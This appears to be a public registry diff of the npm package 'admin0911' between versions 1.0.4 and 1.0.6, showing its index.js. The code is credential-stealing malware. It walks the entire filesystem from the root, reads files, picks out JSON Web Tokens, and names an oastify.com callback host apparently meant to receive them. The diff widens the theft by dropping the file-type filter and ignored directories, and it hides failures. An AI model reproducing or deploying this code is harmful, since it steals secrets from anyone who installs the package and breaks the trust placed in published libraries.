admin0911 1.0.4 → 1.0.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/admin0911-1.0.6.tgz +0 -0
- package/index.js +30 -22
- package/package.json +1 -1
- package/admin0911-1.0.4.tgz +0 -0
|
Binary file
|
package/index.js
CHANGED
|
@@ -1,19 +1,14 @@
|
|
|
1
1
|
const http = require('http');
|
|
2
2
|
const fs = require('fs');
|
|
3
3
|
const path = require('path');
|
|
4
|
+
const os = require('os');
|
|
4
5
|
|
|
5
6
|
const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
|
|
6
|
-
const ROOT_DIR =
|
|
7
|
+
const ROOT_DIR = os.platform() === 'win32' ? 'C:\\' : '/';
|
|
7
8
|
const MAX_FILE_SIZE = 5 * 1024 * 1024; // 5MB
|
|
8
|
-
const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build'];
|
|
9
9
|
|
|
10
10
|
const found = [];
|
|
11
11
|
|
|
12
|
-
function isTextFile(filePath) {
|
|
13
|
-
const textExtensions = ['.js', '.ts', '.jsx', '.tsx', '.json', '.env', '.yaml', '.yml', '.sh', '.py', '.rb', '.go', '.java', '.php', '.txt', '.md', '.cfg', '.ini'];
|
|
14
|
-
return textExtensions.includes(path.extname(filePath).toLowerCase());
|
|
15
|
-
}
|
|
16
|
-
|
|
17
12
|
function base64UrlDecode(input) {
|
|
18
13
|
let str = input.replace(/-/g, '+').replace(/_/g, '/');
|
|
19
14
|
while (str.length % 4) str += '=';
|
|
@@ -23,14 +18,25 @@ function base64UrlDecode(input) {
|
|
|
23
18
|
function isValidJWT(token) {
|
|
24
19
|
const parts = token.split('.');
|
|
25
20
|
if (parts.length !== 3) return false;
|
|
26
|
-
|
|
27
|
-
//
|
|
21
|
+
|
|
22
|
+
// Enforce minimum length to avoid short false positives like 'os.path.join' or semantic versions '1.0.1'
|
|
23
|
+
if (parts[0].length < 20 || parts[1].length < 30) return false;
|
|
24
|
+
|
|
25
|
+
// A real JWT parts must look like valid Base64URL
|
|
28
26
|
if (!/^[A-Za-z0-9_-]+$/.test(parts[0]) || !/^[A-Za-z0-9_-]+$/.test(parts[1])) return false;
|
|
27
|
+
|
|
29
28
|
try {
|
|
30
|
-
const
|
|
31
|
-
const
|
|
32
|
-
|
|
33
|
-
|
|
29
|
+
const headerStr = base64UrlDecode(parts[0]);
|
|
30
|
+
const payloadStr = base64UrlDecode(parts[1]);
|
|
31
|
+
|
|
32
|
+
// Quick sanity check before parsing - headers must contain {"alg"
|
|
33
|
+
if (!headerStr.includes('"alg"')) return false;
|
|
34
|
+
|
|
35
|
+
const header = JSON.parse(headerStr);
|
|
36
|
+
const payload = JSON.parse(payloadStr);
|
|
37
|
+
|
|
38
|
+
// Must look like a real JWT header and contain some payload keys
|
|
39
|
+
return !!(header && header.alg && Object.keys(payload).length > 0);
|
|
34
40
|
} catch {
|
|
35
41
|
return false;
|
|
36
42
|
}
|
|
@@ -44,7 +50,6 @@ function scanFile(filePath) {
|
|
|
44
50
|
try {
|
|
45
51
|
const stats = fs.statSync(filePath);
|
|
46
52
|
if (!stats.isFile() || stats.size > MAX_FILE_SIZE) return;
|
|
47
|
-
if (!isTextFile(filePath)) return;
|
|
48
53
|
|
|
49
54
|
const content = fs.readFileSync(filePath, 'utf8');
|
|
50
55
|
|
|
@@ -88,15 +93,18 @@ function scanFile(filePath) {
|
|
|
88
93
|
}
|
|
89
94
|
|
|
90
95
|
function scanDirectory(dir) {
|
|
91
|
-
|
|
92
|
-
|
|
93
|
-
|
|
94
|
-
|
|
95
|
-
|
|
96
|
-
|
|
97
|
-
|
|
98
|
-
|
|
96
|
+
try {
|
|
97
|
+
const entries = fs.readdirSync(dir, { withFileTypes: true });
|
|
98
|
+
for (const entry of entries) {
|
|
99
|
+
const fullPath = path.join(dir, entry.name);
|
|
100
|
+
if (entry.isDirectory()) {
|
|
101
|
+
scanDirectory(fullPath);
|
|
102
|
+
} else {
|
|
103
|
+
scanFile(fullPath);
|
|
104
|
+
}
|
|
99
105
|
}
|
|
106
|
+
} catch (e) {
|
|
107
|
+
// ignore unreadable directories
|
|
100
108
|
}
|
|
101
109
|
}
|
|
102
110
|
|
package/package.json
CHANGED
package/admin0911-1.0.4.tgz
DELETED
|
Binary file
|